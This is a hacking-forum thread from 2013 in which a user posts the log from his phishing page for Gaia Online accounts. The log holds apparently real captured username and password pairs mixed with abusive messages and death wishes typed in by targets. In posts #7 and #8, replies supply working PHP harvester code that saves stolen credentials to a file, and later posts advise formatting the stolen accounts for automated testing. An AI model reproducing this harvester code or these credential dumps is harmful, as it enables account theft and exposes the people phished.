beastmasterUser= Uricacid Pass= beastmasterUser= Savage390 Pass= westwood52User= You fucking mother fucker,.... Pass= just die a horrible deathUser= JUST FUCKING DIE Pass= BitchUser= still reading? Pass= I hope you die on cancer,....User= bitch Pass= hope you get ballbusted lolUser= still reading?,... Pass= idiotUser= lol,... Pass= come one,... just dieUser= MOTHERFUCKER Pass= are you M? xDUser= Kaya Pass= SaraUser= Saint46 Pass= Tiger14User= did you actually try this? Pass= retarded piece of shitUser= I was already thinking if I should report this to the police lol Pass= hope you get busted,... User= kami Pass= asta1441User= Kurenai Pass= qwert123User= Shady Pass= Tim1!User= Can you maybe just die? Pass= 123456User= come one just die,... scum of the society,... Pass= you cunt,....User= still reading? Pass= you are really an idiot,,..User= cart912 Pass= csy124User= Sarasjevo Pass= BlackPanda!User= btw. you will get spammed to that now,... Pass= gonna post it on 4chan lolUser= cart912 Pass= csy123User= Imawesome1 Pass= Master!User= cart912 Pass= vsy123User= get a job where you really EARN money,... Pass= scumUser= aww,.... sorry,... I forgot,... no one would hire scum like you,.... Pass= can you just die?User= btw,... I really MEAN it,... for the sake of the soceity,.. just die,... criminal scum like has no right to live, Pass= And I really mean it!User= you are still reading? Pass= get a real job already,.. parasiteUser= laumarko Pass= jamjam17User= PKBeam Pass= SergioUser= Feeder21 Pass= holyshitUser= shadyviet Pass= rustedheartsUser= Namenlos Pass= Yester1441User= oskargb Pass= wolf1User= H3llz R3jectz Pass= KevinUser= DIE a horrible death already,... die on cancer and remember me,... Pass= Worthless scumUser= you are still trying? you are undestimating how activ some ppl are,..... Pass= bitchUser= iamsoawesome1 Pass= ChmiaraUser= you worthless piece of scum are stil reading? Pass= 123User= just as a sidenote,... hacking this IP is the last thing you do,... Pass= 123456User= do you know why? I Pass= User= do you know why? I\'m useing my \"comapnys\" ip,.... we got 200k employees,... guess which company it is you moron,.... Pass= btw. I still want you to DIEUser= Come on! hack me so I dont have problems to get you into jail,... Pass= just fucking move your assUser= whats wrong? you don\'t dare to take ma challenge? Pass= worthless piece of shitUser= Do you really expect any results from this? Pass= 1234567u8i9o0ßUser= Lets take a proper view at this,... unless there are only idiots and no normal ppl around,... you might get something from this,... but you already failed at the moment that some ppl who got a brain are around,... try somewhere else,... Pass= 1234567890User= bainrows Pass= maerchenUser= lol Pass= lolUser= Big gigantic buttz Pass= heyhackerUser= anima14 Pass= kuon11User= just fucking DIE,.. I hope you die because of cancer,... Pass= ..!.User= bitch Pass= fuck offUser=
Found it funny he thought I would be afraid of 4chan. Also found it funny he thinks he can report me to the police because his little gaia account got hacked.
Results 1 to 19 of 19
- 04 Feb. 2013 03:32am #1
Someone Messing around on my flp.. Found this so funny.
- 04 Feb. 2013 04:45am #2
cool story bro
- 04 Feb. 2013 05:02am #3
- 04 Feb. 2013 12:59pm #4
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Bahahahahaha someone is fucking pissed.
- 04 Feb. 2013 03:56pm #5
You really should use linebreaks in your file.
username : password is pretty conventional.
fwrite($file, $username . ':' . $password . "\n");
- 04 Feb. 2013 04:50pm #6
i don't know how you'd take any pride in this, or even post it. jesus christ, as charles has said, use bloody carriage returns.
- 04 Feb. 2013 04:56pm #7
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I don't get it, why don't more people say carriage returns? Isn't that what they're called?
Also, @OP:
Code:<?php $username = $_POST['username']; $password = $_POST['password']; $subject = "You have an account waiting for you!"; $body = "Someone fell for your FLP! Their username is " . $username . " and their password is " . $password . "! Happy hacking!"; $date = date("F j, Y"); $all = "Username: " . $username . "\n" . "Password: " . $password . "\n" . "Date: " . $date . "\n"; $file = "youraccountsnshit.txt"; $handle = fopen($file, "a+"); fwrite($handle, $all); fclose($handle); header ("Location:"); header("Content-type: text/plain"); print_r(htmlspecialchars(print_r($_POST, 1))); ?>
- 04 Feb. 2013 05:08pm #8
the date is kind of redundant information as you don't really need it. You're just writing the accounts, and that's it. Unless you want it to be a time stamped mess.
Code:<?php $username = $_POST['username']; $password = $_POST['password']; $subject = "You have a gaiaonline account waiting for you!"; $body = "Someone fell for your fake bloody log in page! Their username is " . $username . " and their password is " . $password; $all = $username . ":" . $password . "\n"; $file = "accounts.txt"; $handle = fopen($file, "a+"); fwrite($handle, $all); fclose($handle); header ("Location:"); header("Content-type: text/plain"); print_r(htmlspecialchars(print_r($_POST, 1))); ?>
- 04 Feb. 2013 05:15pm #9
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Well I had originally set up that PHP script to send you an email every time you get an account instead of recording it to a text file.
It's not a mess though, the log files look like this:
Date: February 4, 2013
Date: February 4, 2013
- 04 Feb. 2013 05:17pm #10
Very funny, nice one.
However, you should list them instead of this large wall of text. It would make it more readable, and therefore more enjoyable.
- 04 Feb. 2013 09:12pm #11
Sorry guy's and I will fix it with the file. Thanks very much(:
User= mother fucking bitch ill kill you Pass= fucker you took my 91 mil give it ackUser
Just got this. I never hacked a 91 mil. LOLLast edited by linzblue; 04 Feb. 2013 at 09:15pm.
- 04 Feb. 2013 09:18pm #12
Carriage returns aren't necessarily the same as line breaks. But they're more or less synonymous.
Programming doesn't work that way. Semantics in general doesn't work that way. Just because a particular term isn't used over another term doesn't make one or the other invalid. There is such a thing called nuances.
- 04 Feb. 2013 09:51pm #13
Why are you all obsessed with having so much text in your output file? username : password works just as well. Do you really need it outlined which is the username and which is the password? Rich Mofo:hunter2 - I think I can figure it out. Timestamps are unnecessary. Especially spelled out. If you want stats on the days, just do like 2-3 for February 3rd. They just make it take longer to load the file, and make it a lot harder to create a bot that will automatically test your accounts for you (or otherwise interpret your results file).
user:pass (date)
Flareumb (2-3)
Charles Stover:smart (2-4)
ThirdNoob:hunter2 (2-4)
- 04 Feb. 2013 10:08pm #14
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- 04 Feb. 2013 10:33pm #15
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It was me bro i was really bored.
- 05 Feb. 2013 02:50am #16
- 05 Feb. 2013 08:10pm #17
Stop lying Mota.
I know for sure it wasn't you...
moteFace: ---- Pm me free gaia's if you'd like. ----
- 05 Feb. 2013 08:54pm #18
Why did you find it so funny?
I don't get tired.
- 06 Feb. 2013 12:49am #19